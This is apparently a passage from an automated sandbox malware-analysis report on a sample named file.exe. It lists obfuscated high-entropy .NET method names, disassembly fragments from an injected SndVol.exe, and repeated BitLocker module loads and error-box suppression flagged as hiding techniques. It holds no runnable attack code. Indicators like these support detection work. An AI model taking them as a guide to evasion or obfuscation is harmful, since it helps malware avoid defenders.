                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A0AB5 pushfd ; retf 9_2_030A0AD2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A0AC0 pushfd ; retf 9_2_030A0AD2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B0E1F push cs; retf 9_2_030B0EC5
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B0E7E push cs; retf 9_2_030B0EC5
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030913F2 push ss; iretd 9_2_030913FD
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_03095279 push 00000002h; iretd 9_2_03095292
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B1004 push ecx; iretd 9_2_030B1019
                Source: file.exeStatic PE information: section name: .text entropy: 7.721476957591344
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, kXGl6TU9X1CLOkDJqb.csHigh entropy of concatenated method names: 'KdgVfp9oSD', 'Sx6Vx1ZbKA', 'K88VT6eFR1', 'PbBVObtw6d', 'nHFVdtYBOu', 'VhHV7bwi2v', 'vngcxQmEH2sHCjosax', 'yoBdM6sWa1VSxrjupO', 'b3HVVqWJrG', 'B4cV9buqfT'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, cOuKhHmbwi2vYGgxwN.csHigh entropy of concatenated method names: 'n6JlvNncx4', 'dNklSXUsOm', 'rWnlFMyYR2', 'gcalfHWggW', 'Us9lx0RiBC', 'kO2FabkHNW', 'LKiFK0hvHV', 'CnZF1wPUIk', 'cGAFYKeJca', 'oPrF2DmYgm'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, xrTuJGVU9taKf4nSoGX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mMxhrughok', 'rFIhbXaMWp', 'LnkhAV197H', 'foMhhSxGdn', 'jbqhMG6bGM', 'XaUhnJfF5P', 'vouh0G3lRh'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, IB2k7n2T1BIPg3qqH6.csHigh entropy of concatenated method names: 'OOTrmDot8b', 'qWQrjGruXb', 'gXDr691vE4', 'tx0rLxWBmH', 'bsYr3vJQQ9', 'DPyrG0uSi2', 'Xc9rHZMl5d', 'cjHrkrtEHk', 'w1frcYtSk4', 'ut1ru3VS9s'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, KSBNsrKqTq8oFUpqsh.csHigh entropy of concatenated method names: 'Q6P8YB4dus', 'NSX8ISddMp', 'Y77CRKpTBd', 'mrACVdl1XE', 'i0s8gBNLPS', 'ukc8XcEFOM', 'zS28wdOaCy', 'xMb8WnDMeg', 'BHa8eKhABY', 'l278o0QJk8'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, voKxv5Ev4EKeqhjyDs.csHigh entropy of concatenated method names: 'afA8TnFYto', 'XbK8ODFoAf', 'ToString', 'Jv28qWvHsi', 'zl08SoCrrh', 'dun8yk2Lxm', 'nd08FS0Ipq', 'mVx8lYH6b0', 'bJe8fB4tH7', 'RDP8xxdSN9'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, aO7fhHWYjBhdXIOiYt.csHigh entropy of concatenated method names: 'GFtdu8VsP4', 'lONdXWSErg', 'la7dWnbK6g', 'DV6deqmRmh', 'EgfdjJZ1wJ', 'k9xd63GP1u', 'BCqdLCm2fs', 'XC2d3Fk6s0', 'kq7dGXrFOv', 'KohdHHHyJM'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, Y8vCQs10HAf48hdxB9.csHigh entropy of concatenated method names: 'ygKrdN36Ws', 'kVxr83oDjN', 'F64rrekcma', 'EtlrA13Tpi', 'vSTrM6mDOL', 'hxrr0VrBfA', 'Dispose', 'tsQCqvffpW', 'TxLCSix1kF', 'g76CyYqYmd'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, OHyVr6VBoFwV6wMCpsU.csHigh entropy of concatenated method names: 'ToString', 'NA8AQVue1D', 'FhFAs9qyyl', 'GYZAJP3o4c', 'vwMAmston7', 'ow9AjIwHIm', 'wsMA609EEl', 'dOHALN9djH', 'hYlSGghN3bSWyrfvoNX', 'fgw3T3h6YU410KEkaY3'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, cLoHjTw0PFUAEUVPUB.csHigh entropy of concatenated method names: 'lHipQZvFaE', 'drhpsN8NmE', 'X3ppmr2PYh', 'dPxpjm4fB8', 'ww0pLqkQcs', 'd2Gp3U6Nin', 'G7DpHoVWiX', 'm5Mpk5GVss', 'GUopuCkukx', 'U2PpgLHolu'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, W3YGtBooICT50ZBVlf.csHigh entropy of concatenated method names: 'ToString', 'ns67gUvavC', 'y9U7jS0pGG', 'Pd976ZU1mE', 'rH47LIkjJQ', 'zmN73eooPy', 'Qgl7GlNAaC', 'FtH7H4Mhhx', 'L2v7kkOCpa', 'JS27cCnjIF'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, EGDBtjBVZVVPdpw7hW.csHigh entropy of concatenated method names: 'rWEPMErm9', 'XXIt1EI3A', 'bTOZxRwRq', 'yCj4FUGxT', 'mqCsMsYT8', 'zgeJlPhp7', 'j6XKWQJPPoDaBM8BOk', 'xLSYpvXxvMsLNGI1OD', 'FNBCnr5MO', 'aAIb4E0Oj'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, Qn6sd0I6oYNvA1mufo.csHigh entropy of concatenated method names: 'zTabyWutwG', 'YKcbFV4Bgd', 'qwSblFWmx0', 'Njvbfg9XRS', 'QXpbriDTk1', 'SSlbx5uw5E', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, GMw5ScVV0XG8ZuIyI8B.csHigh entropy of concatenated method names: 'QAGbI7nP0M', 'UY2bz4psZd', 'rTHARGHjZJ', 'a94AVvYrow', 'ohVABtgFmn', 'Dk4A9xkfE0', 't92AUpZQxU', 'Q35AvwPfXg', 'OaLAqp670X', 'CQ9ASZ74sH'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.csHigh entropy of concatenated method names: 'pVO9vq3pT6', 'VB39qhQBD0', 'DKY9SlaPwN', 'jMF9yXTZKA', 'l0G9FU0F2q', 'FWT9l31jA4', 'qEv9fLttdt', 'fWw9xA1RyM', 'vcq9NFHgpu', 'ibQ9TYCjHQ'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, Op9oSDQex61ZbKAB8f.csHigh entropy of concatenated method names: 'CsTSW6m5qN', 'JQdSeiX3M8', 'QUBSoXH9wZ', 'MZSSEvw0al', 'gtqSaODao1', 'GIkSKBFMgq', 'vvfS1B3Ent', 'QDPSYS0mh7', 'smwS2qH817', 'IJsSIm0fLd'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, xoqIiWzLh8kdieGeYX.csHigh entropy of concatenated method names: 'FIfbZOyCTh', 'N1BbQxTmG7', 'vupbsFwyAK', 'qDEbmHCHBP', 'T8jbjnj9yi', 'O5RbL539qV', 'oFKb3I1kLB', 'wOWb0Qc77X', 'lwvbiw6jyf', 'Gk7bDaBmKK'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, mx5JvpHWsXgly5CUUg.csHigh entropy of concatenated method names: 'MTvfq2GbCO', 'r3xfypLjuM', 'KS8flPH3Ub', 'xaElInIY66', 'UialzDNBjH', 'tS8fRJIPT8', 'Cb9fVJCMxF', 'UOTfBPfEmO', 'OXrf9nSQAX', 'ewbfUI58FN'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, cOBf4lc7MGSjVT9qOP.csHigh entropy of concatenated method names: 'ua4ficB8g2', 'PJbfDOlP3q', 'YxGfPSrmCM', 'g5MftNvpmx', 'ffIf5XEHIM', 'LEbfZWotj3', 'lJXf4F8DsH', 'wS4fQTfR2V', 'CI9fsrMYAi', 'bQpfJA8hFY'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, Aw6dcyJcW2PR2pHFtY.csHigh entropy of concatenated method names: 'eHKF5xsF99', 'w2JF4KrfU5', 'mqMy6bEKCB', 'XUPyLWrltC', 'bNky30WyTw', 'pX4yGi5J09', 'yHeyHLBwEW', 'AQsykio5LW', 'fDAyc6tteq', 'dZVyu0iLny'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, ABIClGs886eFR1wbBb.csHigh entropy of concatenated method names: 'LbFytTdoNq', 'QE8yZmbbKJ', 'MFZyQ3SGLL', 'hoAysS88dc', 'KpdydIA82b', 'y2hy7ySQdM', 'XVZy8IHo2R', 'My9yCXKZit', 'F7NyriG7Na', 'OvQybGSAd4'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, sMG1qLVRNO0QDq6n28l.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OW3bgp9Q85', 'NlobXPVd9O', 'NDtbwJnIOO', 'YgPbWRQNgp', 'gtLbelnlyB', 'acEboiwNLU', 'RKCbESUWqD'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, tJaLrcGPKgemqKlDZQ.csHigh entropy of concatenated method names: 'PGvloMXNft', 'Cm2lEFCSH2', 'YVOlaL5tD9', 'ToString', 'kNdlKTyDWv', 'zmyl1GrBME', 'OLG5ybukF2gPg78wTvq', 'PSFCiLuKJMsXDJM9Ydi', 'HUY4DQuIWWAQDmBlUKO'
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, tCgYVqSESRwHbwGTvM.csHigh entropy of concatenated method names: 'Dispose', 'tf4V28hdxB', 'DxjBjYTqNO', 'VBEVmgORw8', 'dD3VIIYOSm', 'NlwVzAmCHn', 'ProcessDialogKey', 'iwLBRB2k7n', 'm1BBVIPg3q', 'fH6BBwn6sd'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, kXGl6TU9X1CLOkDJqb.csHigh entropy of concatenated method names: 'KdgVfp9oSD', 'Sx6Vx1ZbKA', 'K88VT6eFR1', 'PbBVObtw6d', 'nHFVdtYBOu', 'VhHV7bwi2v', 'vngcxQmEH2sHCjosax', 'yoBdM6sWa1VSxrjupO', 'b3HVVqWJrG', 'B4cV9buqfT'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, cOuKhHmbwi2vYGgxwN.csHigh entropy of concatenated method names: 'n6JlvNncx4', 'dNklSXUsOm', 'rWnlFMyYR2', 'gcalfHWggW', 'Us9lx0RiBC', 'kO2FabkHNW', 'LKiFK0hvHV', 'CnZF1wPUIk', 'cGAFYKeJca', 'oPrF2DmYgm'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, xrTuJGVU9taKf4nSoGX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mMxhrughok', 'rFIhbXaMWp', 'LnkhAV197H', 'foMhhSxGdn', 'jbqhMG6bGM', 'XaUhnJfF5P', 'vouh0G3lRh'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, IB2k7n2T1BIPg3qqH6.csHigh entropy of concatenated method names: 'OOTrmDot8b', 'qWQrjGruXb', 'gXDr691vE4', 'tx0rLxWBmH', 'bsYr3vJQQ9', 'DPyrG0uSi2', 'Xc9rHZMl5d', 'cjHrkrtEHk', 'w1frcYtSk4', 'ut1ru3VS9s'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, KSBNsrKqTq8oFUpqsh.csHigh entropy of concatenated method names: 'Q6P8YB4dus', 'NSX8ISddMp', 'Y77CRKpTBd', 'mrACVdl1XE', 'i0s8gBNLPS', 'ukc8XcEFOM', 'zS28wdOaCy', 'xMb8WnDMeg', 'BHa8eKhABY', 'l278o0QJk8'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, voKxv5Ev4EKeqhjyDs.csHigh entropy of concatenated method names: 'afA8TnFYto', 'XbK8ODFoAf', 'ToString', 'Jv28qWvHsi', 'zl08SoCrrh', 'dun8yk2Lxm', 'nd08FS0Ipq', 'mVx8lYH6b0', 'bJe8fB4tH7', 'RDP8xxdSN9'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, aO7fhHWYjBhdXIOiYt.csHigh entropy of concatenated method names: 'GFtdu8VsP4', 'lONdXWSErg', 'la7dWnbK6g', 'DV6deqmRmh', 'EgfdjJZ1wJ', 'k9xd63GP1u', 'BCqdLCm2fs', 'XC2d3Fk6s0', 'kq7dGXrFOv', 'KohdHHHyJM'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, Y8vCQs10HAf48hdxB9.csHigh entropy of concatenated method names: 'ygKrdN36Ws', 'kVxr83oDjN', 'F64rrekcma', 'EtlrA13Tpi', 'vSTrM6mDOL', 'hxrr0VrBfA', 'Dispose', 'tsQCqvffpW', 'TxLCSix1kF', 'g76CyYqYmd'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, OHyVr6VBoFwV6wMCpsU.csHigh entropy of concatenated method names: 'ToString', 'NA8AQVue1D', 'FhFAs9qyyl', 'GYZAJP3o4c', 'vwMAmston7', 'ow9AjIwHIm', 'wsMA609EEl', 'dOHALN9djH', 'hYlSGghN3bSWyrfvoNX', 'fgw3T3h6YU410KEkaY3'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, cLoHjTw0PFUAEUVPUB.csHigh entropy of concatenated method names: 'lHipQZvFaE', 'drhpsN8NmE', 'X3ppmr2PYh', 'dPxpjm4fB8', 'ww0pLqkQcs', 'd2Gp3U6Nin', 'G7DpHoVWiX', 'm5Mpk5GVss', 'GUopuCkukx', 'U2PpgLHolu'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, W3YGtBooICT50ZBVlf.csHigh entropy of concatenated method names: 'ToString', 'ns67gUvavC', 'y9U7jS0pGG', 'Pd976ZU1mE', 'rH47LIkjJQ', 'zmN73eooPy', 'Qgl7GlNAaC', 'FtH7H4Mhhx', 'L2v7kkOCpa', 'JS27cCnjIF'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, EGDBtjBVZVVPdpw7hW.csHigh entropy of concatenated method names: 'rWEPMErm9', 'XXIt1EI3A', 'bTOZxRwRq', 'yCj4FUGxT', 'mqCsMsYT8', 'zgeJlPhp7', 'j6XKWQJPPoDaBM8BOk', 'xLSYpvXxvMsLNGI1OD', 'FNBCnr5MO', 'aAIb4E0Oj'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, Qn6sd0I6oYNvA1mufo.csHigh entropy of concatenated method names: 'zTabyWutwG', 'YKcbFV4Bgd', 'qwSblFWmx0', 'Njvbfg9XRS', 'QXpbriDTk1', 'SSlbx5uw5E', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, GMw5ScVV0XG8ZuIyI8B.csHigh entropy of concatenated method names: 'QAGbI7nP0M', 'UY2bz4psZd', 'rTHARGHjZJ', 'a94AVvYrow', 'ohVABtgFmn', 'Dk4A9xkfE0', 't92AUpZQxU', 'Q35AvwPfXg', 'OaLAqp670X', 'CQ9ASZ74sH'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.csHigh entropy of concatenated method names: 'pVO9vq3pT6', 'VB39qhQBD0', 'DKY9SlaPwN', 'jMF9yXTZKA', 'l0G9FU0F2q', 'FWT9l31jA4', 'qEv9fLttdt', 'fWw9xA1RyM', 'vcq9NFHgpu', 'ibQ9TYCjHQ'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, Op9oSDQex61ZbKAB8f.csHigh entropy of concatenated method names: 'CsTSW6m5qN', 'JQdSeiX3M8', 'QUBSoXH9wZ', 'MZSSEvw0al', 'gtqSaODao1', 'GIkSKBFMgq', 'vvfS1B3Ent', 'QDPSYS0mh7', 'smwS2qH817', 'IJsSIm0fLd'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, xoqIiWzLh8kdieGeYX.csHigh entropy of concatenated method names: 'FIfbZOyCTh', 'N1BbQxTmG7', 'vupbsFwyAK', 'qDEbmHCHBP', 'T8jbjnj9yi', 'O5RbL539qV', 'oFKb3I1kLB', 'wOWb0Qc77X', 'lwvbiw6jyf', 'Gk7bDaBmKK'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, mx5JvpHWsXgly5CUUg.csHigh entropy of concatenated method names: 'MTvfq2GbCO', 'r3xfypLjuM', 'KS8flPH3Ub', 'xaElInIY66', 'UialzDNBjH', 'tS8fRJIPT8', 'Cb9fVJCMxF', 'UOTfBPfEmO', 'OXrf9nSQAX', 'ewbfUI58FN'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, cOBf4lc7MGSjVT9qOP.csHigh entropy of concatenated method names: 'ua4ficB8g2', 'PJbfDOlP3q', 'YxGfPSrmCM', 'g5MftNvpmx', 'ffIf5XEHIM', 'LEbfZWotj3', 'lJXf4F8DsH', 'wS4fQTfR2V', 'CI9fsrMYAi', 'bQpfJA8hFY'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, Aw6dcyJcW2PR2pHFtY.csHigh entropy of concatenated method names: 'eHKF5xsF99', 'w2JF4KrfU5', 'mqMy6bEKCB', 'XUPyLWrltC', 'bNky30WyTw', 'pX4yGi5J09', 'yHeyHLBwEW', 'AQsykio5LW', 'fDAyc6tteq', 'dZVyu0iLny'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, ABIClGs886eFR1wbBb.csHigh entropy of concatenated method names: 'LbFytTdoNq', 'QE8yZmbbKJ', 'MFZyQ3SGLL', 'hoAysS88dc', 'KpdydIA82b', 'y2hy7ySQdM', 'XVZy8IHo2R', 'My9yCXKZit', 'F7NyriG7Na', 'OvQybGSAd4'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, sMG1qLVRNO0QDq6n28l.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OW3bgp9Q85', 'NlobXPVd9O', 'NDtbwJnIOO', 'YgPbWRQNgp', 'gtLbelnlyB', 'acEboiwNLU', 'RKCbESUWqD'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, tJaLrcGPKgemqKlDZQ.csHigh entropy of concatenated method names: 'PGvloMXNft', 'Cm2lEFCSH2', 'YVOlaL5tD9', 'ToString', 'kNdlKTyDWv', 'zmyl1GrBME', 'OLG5ybukF2gPg78wTvq', 'PSFCiLuKJMsXDJM9Ydi', 'HUY4DQuIWWAQDmBlUKO'
                Source: 0.2.file.exe.4af1228.2.raw.unpack, tCgYVqSESRwHbwGTvM.csHigh entropy of concatenated method names: 'Dispose', 'tf4V28hdxB', 'DxjBjYTqNO', 'VBEVmgORw8', 'dD3VIIYOSm', 'NlwVzAmCHn', 'ProcessDialogKey', 'iwLBRB2k7n', 'm1BBVIPg3q', 'fH6BBwn6sd'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
